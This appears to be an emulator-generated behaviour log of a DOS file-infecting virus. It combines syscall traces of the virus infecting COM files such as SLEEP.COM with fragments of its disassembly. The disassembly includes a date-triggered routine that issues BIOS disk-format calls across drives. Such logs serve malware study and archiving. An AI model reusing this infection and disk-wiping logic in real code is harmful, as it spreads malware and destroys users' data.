0x151d9: mov ah, 0x3f
0x151db: mov cx, 0x1a
0x151de: lea dx, word ptr [bp + 0x406]
0x151e2: int 0x21
0x151e4: mov bx, word ptr ds:[bp + 0x3f6]
0x151e9: cmp word ptr cs:[bp + 0x409], 0x5850
0x151f0: je 0x151f5
0x151f2: jmp 0x151f7
0x151f4: nop
0x151f5: jmp 0x151a4
2018-12-25T11:55:05.90273368Z 78 PC: 1519f | Find first file
2018-12-25T11:55:05.91012805Z 61 PC: 15259 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:05.916760115Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:55:05.924479472Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.931769998Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 6)
2018-12-25T11:55:05.93513314Z 66 PC: 1522f | Move file pointer
2018-12-25T11:55:05.936852433Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 6)
2018-12-25T11:55:05.951665006Z 87 PC: 15249 | Get or set file date and time
2018-12-25T11:55:05.961118463Z 62 PC: 1524d | Close file
2018-12-25T11:55:05.969471964Z 79 PC: 151a8 | Find next file
2018-12-25T11:55:05.97247565Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.976987786Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:05.981103851Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:05.985192955Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:05.987469225Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:05.98837672Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:05.99364821Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:05.996043549Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.004305946Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.007830569Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.015718399Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.022411061Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.034513255Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.042956795Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.04436082Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.05237627Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.054630094Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.062642667Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.065221111Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.072018607Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.078437658Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.085206122Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.088754857Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.090337631Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.098803018Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.101199132Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.10902617Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.111933053Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.118867988Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.126528826Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.131234522Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.134107171Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.136007139Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.138976706Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.140656699Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.143028151Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.145818351Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.152466722Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.159509302Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.171115393Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.177546938Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.179135423Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.187585286Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.189137054Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.197671067Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.200275814Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.206632985Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.213907209Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.220743919Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.223740344Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.22619848Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.23491726Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.236668537Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.245315158Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.247994302Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.254759357Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.261880483Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.264451515Z 59 PC: 151b5 | Change current directory
2018-12-25T11:55:06.268561422Z 59 PC: 1518c | Change current directory
2018-12-25T11:55:06.270857006Z 26 PC: 15193 | Set disk transfer address
2018-12-25T11:55:06.272055156Z 9 PC: 12aa4 | Display string (String= ' This file is infected with a virus! Pre infection file size = 10,000 ')
2018-12-25T11:55:06.275835778Z 76 PC: 12aa9 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5645,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:06.037609684Z 64 PC: 0 | Write file or device (Write 2 bytes on handle 1)
2018-12-25T11:55:06.046603876Z 41 PC: 94fae | Parse filename
2018-12-25T11:55:06.064769871Z 41 PC: 9502f | Parse filename
2018-12-25T11:55:06.06741968Z 41 PC: 9504c | Parse filename
2018-12-25T11:55:06.070369511Z 26 PC: 984f7 | Set disk transfer address
2018-12-25T11:55:06.073030024Z 71 PC: 986f3 | Get current directory
2018-12-25T11:55:06.08050407Z 78 PC: 986fe | Find first file
2018-12-25T11:55:06.107555598Z 71 PC: 986f3 | Get current directory (See above)
2018-12-25T11:55:06.111223703Z 78 PC: 986fe | Find first file (See above)
2018-12-25T11:55:06.131406249Z 64 PC: 9a848 | Write file or device (Write 26 bytes on handle 2)
2018-12-25T11:55:06.140830627Z 37 PC: 123c4 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T11:55:06.148348704Z 37 PC: 123cb | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T11:55:06.150377531Z 37 PC: 123d2 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:55:06.152084736Z 62 PC: 122ab | Close file
2018-12-25T11:55:06.154141922Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.157120683Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.158770068Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.160423773Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.162750978Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.164416435Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.165884109Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.168036918Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.170110482Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.171709708Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.173887992Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.175567807Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.178023019Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.180779453Z 62 PC: 122ab | Close file (See above)
2018-12-25T11:55:06.183755286Z 99 PC: 9a5d7 | Get DBCS lead byte table pointer
2018-12-25T11:55:06.185578451Z 56 PC: 94df9 | Get or set country info
2018-12-25T11:55:06.188383565Z 64 PC: 9a848 | Write file or device (See above)
2018-12-25T11:55:06.199154396Z 25 PC: 94e62 | Get default drive
2018-12-25T11:55:06.20120382Z 71 PC: 970dd | Get current directory
2018-12-25T11:55:06.205880355Z 64 PC: 9a848 | Write file or device (See above)
2018-12-25T11:55:06.210482003Z 2 PC: 970b2 | Character output (Char = '3e')
2018-12-25T11:55:06.212971245Z 93 PC: 94f20 | File sharing functions
2018-12-25T11:55:06.215868067Z 93 PC: 94f27 | File sharing functions
2018-12-25T11:55:06.232299589Z 10 PC: 94f39 | Buffered keyboard input
2018-12-25T11:55:21.083995984Z 0 PC: 0 | Program terminate (See above)
2018-12-25T11:55:22.439024372Z 0 PC: 0 | Program terminate (See above)
2018-12-25T11:55:22.541639532Z 64 PC: 9a848 | Write file or device (See above)
2018-12-25T11:55:22.548623516Z 41 PC: 94fae | Parse filename (See above)
2018-12-25T11:55:22.552335265Z 41 PC: 9502f | Parse filename (See above)
2018-12-25T11:55:22.556029932Z 41 PC: 9504c | Parse filename (See above)
2018-12-25T11:55:22.559062952Z 26 PC: 984f7 | Set disk transfer address (See above)
2018-12-25T11:55:22.561641003Z 71 PC: 986f3 | Get current directory (See above)
2018-12-25T11:55:22.570928574Z 78 PC: 986fe | Find first file (See above)
2018-12-25T11:55:22.581498535Z 71 PC: 9856c | Get current directory
2018-12-25T11:55:22.585333366Z 73 PC: 97c09 | Release memory
2018-12-25T11:55:22.589414717Z 75 PC: 11821 | Execute program
2018-12-25T11:55:22.606021575Z 9 PC: 12a47 | Display string (String= 'Hello, World! ')
2018-12-25T11:55:22.610553421Z 76 PC: 12a4b | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5645,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:06.109553108Z 26 PC: 15157 | Set disk transfer address
2018-12-25T11:55:06.112251342Z 26 PC: 15171 | Set disk transfer address
2018-12-25T11:55:06.113945625Z 71 PC: 1517b | Get current directory
2018-12-25T11:55:06.118679774Z 42 PC: 1525f | Get date 0x1525f: cmp dl, 0x1e
0x15262: je 0x15265
0x15264: ret
0x15265: mov ah, 0xf
0x15267: int 0x10
0x15269: mov ah, 0
0x1526b: int 0x10
0x1526d: mov ah, 9
0x1526f: lea dx, word ptr [bp + 0x238]
0x15273: int 0x21
0x15275: ret
0x15276: mov ah, 5
0x15278: mov ch, 0
0x1527a: mov dh, 0
0x1527c: mov dl, byte ptr [0x431]
0x15280: int 0x13
0x15282: ret
0x15283: and dh, dl
2018-12-25T11:55:06.122972217Z 42 PC: 151bd | Get date 0x151bd: cmp dl, 1
0x151c0: je 0x151c3
0x151c2: ret
0x151c3: mov al, byte ptr [0x431]
0x151c6: call 0x15276
0x151c9: cmp byte ptr [0x431], 4
0x151ce: je 0x15194
0x151d0: inc byte ptr [0x431]
0x151d4: loop 0x151c3
0x151d6: call 0x15250
0x151d9: mov ah, 0x3f
0x151db: mov cx, 0x1a
0x151de: lea dx, word ptr [bp + 0x406]
0x151e2: int 0x21
0x151e4: mov bx, word ptr ds:[bp + 0x3f6]
0x151e9: cmp word ptr cs:[bp + 0x409], 0x5850
0x151f0: je 0x151f5
0x151f2: jmp 0x151f7
0x151f4: nop
0x151f5: jmp 0x151a4
2018-12-25T11:55:06.127813369Z 78 PC: 1519f | Find first file
2018-12-25T11:55:06.134848121Z 61 PC: 15259 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:06.142850797Z 63 PC: 151e4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:55:06.150102392Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.157922476Z 64 PC: 15227 | Write file or device (Write 5 bytes on handle 6)
2018-12-25T11:55:06.162323554Z 66 PC: 1522f | Move file pointer
2018-12-25T11:55:06.16437965Z 64 PC: 1523a | Write file or device (Write 801 bytes on handle 6)
2018-12-25T11:55:06.181242263Z 87 PC: 15249 | Get or set file date and time
2018-12-25T11:55:06.183320933Z 62 PC: 1524d | Close file
2018-12-25T11:55:06.192878826Z 79 PC: 151a8 | Find next file
2018-12-25T11:55:06.197184879Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.205027956Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.213880231Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.221946494Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.225158546Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.227916803Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.237482602Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.239808705Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.249648921Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.253165042Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.261807443Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.269935962Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.277484822Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.281040009Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.283714454Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.292767768Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.294565619Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.30408597Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.314134836Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.321906941Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.330013912Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.338534258Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.342015197Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.344005351Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.353947783Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.355804967Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.371233618Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.375096641Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.38264313Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.390247327Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.396064459Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.39915443Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.401199943Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.405959469Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.408111607Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.410481236Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.413979944Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.421787931Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.429099961Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.436560182Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.440005057Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.441927382Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.451855954Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.454526303Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.464059426Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.467367271Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.475891677Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.483798385Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.491545199Z 64 PC: 15227 | Write file or device (See above)
2018-12-25T11:55:06.496437639Z 66 PC: 1522f | Move file pointer (See above)
2018-12-25T11:55:06.498276458Z 64 PC: 1523a | Write file or device (See above)
2018-12-25T11:55:06.50810086Z 87 PC: 15249 | Get or set file date and time (See above)
2018-12-25T11:55:06.510262518Z 62 PC: 1524d | Close file (See above)
2018-12-25T11:55:06.520642307Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.523984051Z 61 PC: 15259 | Open file (See above)
2018-12-25T11:55:06.532952797Z 63 PC: 151e4 | Read file or device (See above)
2018-12-25T11:55:06.537023773Z 79 PC: 151a8 | Find next file (See above)
2018-12-25T11:55:06.539886802Z 59 PC: 151b5 | Change current directory
2018-12-25T11:55:06.544623571Z 59 PC: 1518c | Change current directory
2018-12-25T11:55:06.547403969Z 26 PC: 15193 | Set disk transfer address
2018-12-25T11:55:06.548845242Z 9 PC: 12aa4 | Display string (String= ' This file is infected with a virus! Pre infection file size = 10,000 ')
2018-12-25T11:55:06.559419422Z 76 PC: 12aa9 | Terminate with return code (Return code = '1')